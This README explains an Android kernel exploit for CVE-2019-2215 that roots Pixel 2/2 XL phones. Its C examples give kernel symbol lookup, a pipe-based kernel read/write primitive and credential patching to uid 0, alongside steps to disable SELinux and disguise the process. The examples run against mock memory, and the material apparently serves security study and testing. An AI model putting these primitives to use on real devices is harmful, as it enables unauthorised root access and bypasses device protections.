# CVE-2019-2115-Pixel-2-2-XL
Translation to English
This script is an exploit targeting the Google Pixel 2 and Pixel 2 XL through CVE-2019-2215, a use-after-free in the Binder driver (the repository name spells it CVE-2019-2115). It uses the bug to obtain arbitrary read/write access to kernel memory and, from there, root privileges on the device.
1. Script Objective
Identify the Linux kernel version in use.
Exploit the vulnerability to gain read/write access to kernel memory.
Temporarily disable security mechanisms (such as SELinux).
Elevate process privileges by modifying its credentials in the kernel.
Launch a root shell or activate debug mode.
Clean up traces of exploitation by restoring protections.
2. Detailed Explanation of the Script
2.1 Inclusion of Libraries
The script includes several system libraries for kernel manipulation and exploitation:
fcntl.h, unistd.h, sys/ioctl.h → File management and system calls
sys/mman.h → Memory management
sys/epoll.h → Event handling
sys/prctl.h → Process attribute modification (e.g., hiding its name)
sys/socket.h → Socket management for kernel exploitation
sys/utsname.h → Kernel information retrieval
2.2 Definition of Types and Global Variables
The script uses global variables to store kernel symbol addresses:
ksym_init_task, ksym_init_user_ns, ksym_selinux_enabled, ksym_selinux_enforcing
kernel_rw_pipe[2]: Pipe used as the copy channel for kernel reads and writes (data is pushed in with write() and pulled out with read())
dummy_page: A memory page used for exploitation
binder_fd, epoll_fd: File descriptors for interacting with Binder and Epoll
2.3 Kernel Symbol Resolution (resolve_symbol())
Reads /proc/kallsyms line by line to retrieve the addresses of the symbols the exploit needs.
Uses sscanf() to parse each line's address and name, e.g. init_task, which serves as the head of the task list from which the current process is located. Caveat: with kptr_restrict set, an unprivileged reader sees every address as 0, so the result must be checked before it is used.
2.4 Kernel Version Detection
uname(&kernel_info) retrieves the kernel version.
Checks whether the kernel is 5.4 or 4.19 in order to select the offsets used later in the exploit. Note that both of these branches already contain the upstream fix for this Binder bug (merged in Linux 4.14 in 2017), while the Pixel 2/2 XL builds affected at disclosure run a 4.4 kernel, so this version check should be verified against the device actually being targeted.
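The two helpers described in 2.3 and 2.4, written out as an added example (this is not the script's own code): a kallsyms lookup that treats an all-zero address as "hidden by kptr_restrict" rather than as a usable pointer, and a release-string parser built on uname(). The sample kallsyms text is constructed for the demo; the only assumption about the real file is its documented `address type name` line format.

```c
/* Added example: kallsyms symbol resolution with the kptr_restrict check,
 * plus kernel release parsing. Not taken from the exploit script. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Constructed sample in /proc/kallsyms format (addresses are made up). */
static const char *SAMPLE_KALLSYMS =
    "0000000000000000 T _text\n"
    "ffffff8008a3c000 D init_task\n"
    "ffffff8008b00000 D init_user_ns\n"
    "ffffff8008c01234 d selinux_enforcing\n";

/* Parse one line such as "ffffff8008a3c000 D init_task [module]".
 * Returns 1 and fills *addr when the symbol name matches `name`. */
static int kallsyms_line_matches(const char *line, const char *name, uint64_t *addr)
{
    unsigned long long a;
    char type;
    char sym[256];
    if (sscanf(line, "%llx %c %255s", &a, &type, sym) != 3)
        return 0;
    if (strcmp(sym, name) != 0)
        return 0;
    *addr = (uint64_t)a;
    return 1;
}

/* Resolve `name` from a kallsyms-formatted text buffer. Returns 0 when the
 * symbol is absent OR when the kernel hides addresses (kptr_restrict makes
 * every address read as 0); callers must treat 0 as "not usable". */
static uint64_t resolve_symbol_from_text(const char *text, const char *name)
{
    const char *p = text;
    char line[512];
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        uint64_t addr;
        if (kallsyms_line_matches(line, name, &addr))
            return addr;
        p = nl ? nl + 1 : p + len;
    }
    return 0;
}

/* Same lookup against the live /proc/kallsyms. */
static uint64_t resolve_symbol(const char *name)
{
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f) return 0;
    char line[512];
    uint64_t addr = 0;
    while (fgets(line, sizeof line, f))
        if (kallsyms_line_matches(line, name, &addr))
            break;
    fclose(f);
    return addr;
}

/* Parse "4.4.177-g83bee1dc48a8" style release strings into major/minor.
 * Returns 0 on malformed input. */
static int parse_kernel_release(const char *release, int *major, int *minor)
{
    int maj, min;
    if (sscanf(release, "%d.%d", &maj, &min) != 2) return 0;
    *major = maj;
    *minor = min;
    return 1;
}

/* Version of the running kernel via uname(2). */
static int current_kernel_version(int *major, int *minor)
{
    struct utsname u;
    if (uname(&u) != 0) return 0;
    return parse_kernel_release(u.release, major, minor);
}

int main(void)
{
    int maj, min;
    if (current_kernel_version(&maj, &min))
        printf("running kernel: %d.%d\n", maj, min);
    uint64_t t = resolve_symbol_from_text(SAMPLE_KALLSYMS, "init_task");
    printf("sample init_task = %#llx\n", (unsigned long long)t);
    uint64_t live = resolve_symbol("init_task");
    printf("live init_task  = %#llx%s\n", (unsigned long long)live,
           live ? "" : " (absent or hidden by kptr_restrict)");
    return 0;
}
```

On a device where kptr_restrict is 1 or 2 an app-uid process gets the "hidden" result for every symbol; an exploit that ignores this ends up dereferencing address 0 once it has kernel read/write.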
2.5 Kernel Memory Read/Write (kread() and kwrite())
Uses kernel_rw_pipe as a copy channel: write() pushes bytes from a source address into the pipe and read() pulls them out to a destination address. Once the exploit has lifted the calling thread's addr_limit, either address may be a kernel address, which is what turns an ordinary pipe into a kernel read/write primitive.
kread() copies from kernel memory into a user buffer.
kwrite() copies a user buffer into kernel memory.
kwrite_u32() is the 32-bit convenience wrapper for single fields.
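The pipe-based primitive from 2.5, as an added example that is not the script's code. It is written so it can be exercised on user-space addresses without the exploit: on an unmodified process the same write()/read() pair only moves bytes between user buffers, and a bad address comes back as EFAULT. In the real exploit the calls are identical but target kernel addresses after addr_limit has been raised; there, a wrong kernel address does not return an error, it faults the kernel and panics the device. The chunking keeps each transfer below the pipe's capacity so a write can never block waiting for a reader that is the same thread.

```c
/* Added example: pipe-based copy primitive (kread/kwrite), runnable on
 * user memory. Not taken from the exploit script. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static int kernel_rw_pipe[2] = { -1, -1 };

/* Keep every transfer well below the default pipe capacity (64 KiB on Linux):
 * a single write() larger than the free space would block forever, because
 * nothing drains the pipe until our own read() runs. 4096 is also <= PIPE_BUF,
 * so each write is atomic and never short. */
#define KRW_CHUNK 4096

static int kernel_rw_init(void)
{
    if (kernel_rw_pipe[0] >= 0) return 0;
    return pipe(kernel_rw_pipe) == 0 ? 0 : -1;
}

/* write() n bytes from `src` into the pipe, then read() them back into `dst`.
 * With addr_limit lifted, either side may be a kernel address. A failing
 * write() means `src` is not readable, a failing read() means `dst` is not
 * writable; in user space both surface as -1/EFAULT. */
static int pipe_copy(void *dst, const void *src, size_t n)
{
    const char *s = src;
    char *d = dst;
    while (n > 0) {
        size_t chunk = n < KRW_CHUNK ? n : KRW_CHUNK;
        ssize_t w = write(kernel_rw_pipe[1], s, chunk);
        if (w != (ssize_t)chunk) return -1;
        ssize_t r = read(kernel_rw_pipe[0], d, chunk);
        if (r != (ssize_t)chunk) return -1;
        s += chunk;
        d += chunk;
        n -= chunk;
    }
    return 0;
}

/* kread: kernel address -> user buffer */
static int kread(uint64_t kaddr, void *buf, size_t len)
{
    return pipe_copy(buf, (const void *)(uintptr_t)kaddr, len);
}

/* kwrite: user buffer -> kernel address */
static int kwrite(uint64_t kaddr, const void *buf, size_t len)
{
    return pipe_copy((void *)(uintptr_t)kaddr, buf, len);
}

static int kwrite_u32(uint64_t kaddr, uint32_t val)
{
    return kwrite(kaddr, &val, sizeof val);
}

static uint32_t kread_u32(uint64_t kaddr)
{
    uint32_t v = 0;
    kread(kaddr, &v, sizeof v);
    return v;
}

/* Demo on user memory: a 10000-byte copy that spans several chunks.
 * Returns 1 when the destination matches the source. */
static int demo_roundtrip(void)
{
    static unsigned char src[10000], dst[10000];
    if (kernel_rw_init() != 0) return 0;
    for (size_t i = 0; i < sizeof src; i++) src[i] = (unsigned char)(i * 7);
    memset(dst, 0, sizeof dst);
    if (kwrite((uint64_t)(uintptr_t)dst, src, sizeof src) != 0) return 0;
    return memcmp(src, dst, sizeof src) == 0;
}

int main(void)
{
    printf("roundtrip through pipe: %s\n", demo_roundtrip() ? "ok" : "FAILED");
    uint32_t cell = 0;
    kwrite_u32((uint64_t)(uintptr_t)&cell, 0xdeadbeefu);
    printf("cell = %#x\n", kread_u32((uint64_t)(uintptr_t)&cell));
    return 0;
}
```

The check on the return value of every read()/write() is the part worth copying: the public exploits for this bug are usually written for one firmware build, and a silent short copy is how a wrong offset turns into a corrupted task_struct.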
2.6 Exploitation and Privilege Escalation
The script follows multiple stages via execute_stage():
1. prepare_globals()
Retrieves addresses of critical symbols.
Allocates a memory page with mmap().
Creates a pipe for kernel communication.
Opens /dev/binder to interact with Binder.
2. find_current()
Identifies the current process by locating its task_struct.
3. obtain_kernel_rw()
Exploits CVE-2019-2215 to obtain kernel read/write. The bug itself: a binder_thread freed through the BINDER_THREAD_EXIT ioctl stays referenced from an epoll wait queue, so a later epoll operation writes into freed memory. The public technique reclaims that memory with iovec arrays and turns the dangling write into a leak of the thread's task_struct and an overwrite of its addr_limit, after which ordinary read()/write() through the pipe reach kernel addresses.
4. find_kernel_base()
Detects the kernel base address to adjust offsets used in the exploit.
5. patch_creds()
Modifies the process's credentials (struct cred) in kernel memory so that its uid becomes 0, i.e. root.
6. launch_shell()
Launches a root shell to execute commands with elevated privileges.
7. launch_debug_console() (only if debug mode is enabled)
Provides an interactive session for testing the exploit.
2.7 Cleanup After Exploitation
restore_original_values() re-enables SELinux after modifying its values in kernel memory.
mask_logs_and_process() renames the process with prctl(PR_SET_NAME, "hacker_process"). Note that this only changes the 16-byte comm field shown in /proc/<pid>/comm and ps; it removes no kernel log entries or other evidence.
execute_cleanup_stage() performs these actions at the end.
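The patch_creds() step from 2.6 and the save/restore pair from 2.7, as an added example that is not the script's code. It is written against a small read/write backend so it can run here over a constructed fake kernel image in a user buffer; in the exploit the backend would be the pipe-based kread()/kwrite(). The struct cred offsets are an assumption for the demo: they follow the field order of struct cred on a kernel built without CONFIG_DEBUG_CREDENTIALS (usage, then the eight 32-bit ids, securebits, then the capability sets), but they are not taken from the script and must be checked against the target kernel's headers. The addresses FAKE_CRED and FAKE_SELINUX_ENFORCING are likewise made up.

```c
/* Added example: credential patching with read-back verification and a
 * SELinux save/restore pair, over a mock memory backend. Not the script's code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Memory backend: in the exploit these are kread()/kwrite() over the pipe. */
typedef int (*kmem_rw_fn)(uint64_t addr, void *buf, size_t len);
struct kmem { kmem_rw_fn read; kmem_rw_fn write; };

/* ASSUMED struct cred layout (no CONFIG_DEBUG_CREDENTIALS): usage (4 bytes),
 * then uid,gid,suid,sgid,euid,egid,fsuid,fsgid (4 bytes each), securebits,
 * then the capability sets (8 bytes each). Verify against the target kernel. */
#define CRED_OFF_UID        4
#define CRED_N_IDS          8
#define CRED_OFF_SECUREBITS (CRED_OFF_UID + CRED_N_IDS * 4)   /* 36 */
#define CRED_OFF_CAPS       (CRED_OFF_SECUREBITS + 4)         /* 40 */
#define CRED_N_CAPSETS      5   /* inheritable, permitted, effective, bset, ambient */
#define CAP_ALL             0x3fffffffffULL  /* bits 0..37: CAP_LAST_CAP = 37 on 4.x */

/* Zero every id (root) and fill every capability set. Every write is read back;
 * returns -1 at the first mismatch so a wrong offset is caught immediately. */
static int patch_creds(struct kmem *m, uint64_t cred)
{
    uint32_t zero = 0, check;
    for (int i = 0; i < CRED_N_IDS; i++) {
        uint64_t a = cred + CRED_OFF_UID + 4 * i;
        if (m->write(a, &zero, 4) || m->read(a, &check, 4) || check != 0) return -1;
    }
    uint64_t full = CAP_ALL, back;
    for (int i = 0; i < CRED_N_CAPSETS; i++) {
        uint64_t a = cred + CRED_OFF_CAPS + 8 * i;
        if (m->write(a, &full, 8) || m->read(a, &back, 8) || back != full) return -1;
    }
    return 0;
}

/* Save the current selinux_enforcing value, then clear it. */
static int selinux_disable(struct kmem *m, uint64_t enforcing_addr, uint32_t *saved)
{
    uint32_t zero = 0;
    if (m->read(enforcing_addr, saved, 4)) return -1;
    return m->write(enforcing_addr, &zero, 4);
}

/* Put the saved value back so the device is left in its original mode. */
static int selinux_restore(struct kmem *m, uint64_t enforcing_addr, uint32_t saved)
{
    uint32_t check;
    if (m->write(enforcing_addr, &saved, 4) || m->read(enforcing_addr, &check, 4)) return -1;
    return check == saved ? 0 : -1;
}

/* ---- constructed fake kernel memory for the demo ---- */
static unsigned char fake_kmem[256];
#define FAKE_BASE               0xffffff8000000000ULL   /* made-up address */
#define FAKE_CRED               (FAKE_BASE + 0x00)
#define FAKE_SELINUX_ENFORCING  (FAKE_BASE + 0x80)

static int fake_read(uint64_t a, void *b, size_t n)
{
    if (a < FAKE_BASE || a + n > FAKE_BASE + sizeof fake_kmem) return -1;
    memcpy(b, fake_kmem + (a - FAKE_BASE), n);
    return 0;
}

static int fake_write(uint64_t a, void *b, size_t n)
{
    if (a < FAKE_BASE || a + n > FAKE_BASE + sizeof fake_kmem) return -1;
    memcpy(fake_kmem + (a - FAKE_BASE), b, n);
    return 0;
}

/* An app uid in every id slot and SELinux enforcing, as a real target would look. */
static void fake_reset(void)
{
    memset(fake_kmem, 0, sizeof fake_kmem);
    uint32_t ids[CRED_N_IDS];
    for (int i = 0; i < CRED_N_IDS; i++) ids[i] = 10123;
    memcpy(fake_kmem + CRED_OFF_UID, ids, sizeof ids);
    uint32_t enforcing = 1;
    memcpy(fake_kmem + 0x80, &enforcing, 4);
}

static uint32_t fake_u32(uint64_t a) { uint32_t v = 0; fake_read(a, &v, 4); return v; }
static uint64_t fake_u64(uint64_t a) { uint64_t v = 0; fake_read(a, &v, 8); return v; }

int main(void)
{
    struct kmem m = { fake_read, fake_write };
    uint32_t saved = 0;
    fake_reset();
    printf("uid before: %u\n", fake_u32(FAKE_CRED + CRED_OFF_UID));
    printf("patch_creds: %d\n", patch_creds(&m, FAKE_CRED));
    printf("uid after:  %u\n", fake_u32(FAKE_CRED + CRED_OFF_UID));
    printf("disable: %d (saved=%u) restore: %d\n",
           selinux_disable(&m, FAKE_SELINUX_ENFORCING, &saved), saved,
           selinux_restore(&m, FAKE_SELINUX_ENFORCING, saved));
    return 0;
}
```

Saving the original selinux_enforcing value instead of hard-coding 1 on the way out matters on test devices that were already permissive; the read-back after each write is what makes a bad offset fail loudly in patch_creds rather than in a later, unrelated kernel path.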
3. Security and Impact
3.1 Vulnerability Exploited: CVE-2019-2215
Type: Use-after-free in the Binder subsystem
Effect: Grants arbitrary read/write access to kernel memory
Vulnerable Systems: Android devices whose kernel lacks the fix for this bug (merged upstream in Linux 4.14 in late 2017 and backported to the Android 3.18, 4.4 and 4.9 branches); the Pixel 2/2 XL builds affected at disclosure ran a 4.4 kernel. A 4.19 or 5.4 kernel already contains the fix, so the version branches this script handles for them cannot be exploited through this bug.
3.2 Consequences of Execution
✅ Temporary root access (temproot), allowing system file modifications.
✅ Bypasses Android security mechanisms such as SELinux.
⚠ Risk of device bricking if mishandled.
⚠ Can be detected by advanced security mechanisms like SafetyNet.
This script is an exploit designed to take advantage of CVE-2019-2215 and gain root privileges on the Pixel 2/2 XL. It relies on a combination of kernel memory manipulation, SELinux deactivation, and modification of the process's credential structure.
While such techniques are used for security testing (pentesting), they can also be misused for malicious attacks. Running this code on a non-vulnerable device will not work and may crash the device with a kernel panic.
Repository layout as extracted:

```text
[4.0K] /data/pocs/97f21570d609b7af5a3111d61866a81b9e20880b
├── [5.0K] CVE-2019-2115
└── [4.2K] README.md

0 directories, 2 files
```